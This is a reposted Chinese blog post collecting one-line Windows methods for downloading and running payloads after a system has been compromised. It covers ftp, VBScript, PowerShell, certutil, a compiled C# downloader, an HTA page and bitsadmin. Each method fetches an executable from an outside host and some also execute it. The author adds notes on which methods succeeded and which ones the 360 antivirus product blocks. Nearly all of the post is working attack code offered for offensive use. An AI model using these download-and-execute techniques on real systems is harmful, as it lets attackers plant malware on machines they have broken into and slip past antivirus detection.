碼上快樂

相關內容    簡體    繁體

一句話下載總結(用於后滲透上傳payload)

本文轉載自   查看原文   2019-10-17 09:49   345    Mikasa

利用ftp來下載payload文件

echo open 192.168.1.1 21> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo ftp>> ftp.txt
echo GET 1.exe >> ftp.txt
ftp -s:ftp.txt

后記:這個我沒有實驗成功太菜了

利用vbs來下載payload

Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.1/1.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\test\1.exe",2

后記:這個已經利用成功了,網上說可以用script來執行,可能win10上面沒有,但是可以直接雙擊運行,或者命令行里面直接使用,vbs腳本后綴為vbs

利用Powershell來下載payload

powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:\test\1.exe');start-process 'C:\test\1.exe'

后記:是在命令行中執行以上命令

利用certutil下載文件

直接下載certutil.exe -urlcache -split -f http://192.168.1.1/1.exe

指定文件名保存certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.php

刪除緩存certutil.exe -urlcache -split -f http://192.168.1.1/1.exe delete
查看緩存certutil.exe -urlcache *

至於這個緩存有什么用就不知道了
后記:下載的文件就在當前目錄並且文件名與url相同(除非指定文件名保存),360會攔截

利用CSC(windows的c#編譯器)來下載文件

1.cs文件內容

using System.Net;
namespace downloader
{
    class Program
    {
        static void Main(string[] args)
        {
            WebClient client = new WebClient();
            string URLAddress = @"http://192.168.1.1/1.exe";
            string receivePath = @"C:\test\";
            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName
        (URLAddress));
        }
    }
}

后記:csc.exe位於C:\Windows\Microsoft.NET\Framework\v2.0.50727。因為未加入環境變量中所以需要指定路徑。
使用方式:C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:C:\tes
t\download.exe C:\test\1.cs
這樣1.cs就會被編輯為exe文件,我們運行一下就會把文件下載下來了,360會進行攔截,估計是捕獲了下載的時候的流量了,因為並不是直接就攔截了

hta下載文件

將下列代碼保存至.hta文件

<html>
<head>
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.1.1/1.exe",false);
Object.send();
if (Object.Status == 200)
{
    var Stream = new ActiveXObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile("C:\\test\\1.exe", 2);
    Stream.Close();
}
window.close();
</script>
<HTA:APPLICATION
WINDOWSTATE = "minimize">
</head>
<body>
</body>  
</html>

后記:直接雙擊運行既可或者命令行直接執行,360會攔截

利用bitsadmin下載文件

bitsadmin是一個控制台工具,可用於創建下載或上傳工作和監測其進展情況。xp以后的Windows系統自帶

bitsadmin /transfer n http://192.168.1.1/1.exe C:\test\update\1.exe

后記:不支持https/ftp協議,php/python自帶的服務器會報錯,360會攔截

總結,其實感覺Windows上可以玩的東西比Linux多,使用的也比Linux多,這可能也是紅藍對抗偏向於這邊的原因吧


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 一句話 攻防世界 上傳一句話木馬 文件上傳之一句話木馬原理及制作 PHP文件上傳漏洞與一句話木馬 一句話木馬上傳(webshell) php一句話圖片馬上傳繞過 一句話總結各個算法以及應用場景? 常用的一句話反彈shell總結 PHP一句話木馬小總結與SQL語句寫一句話木馬 jsp一句話木馬
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM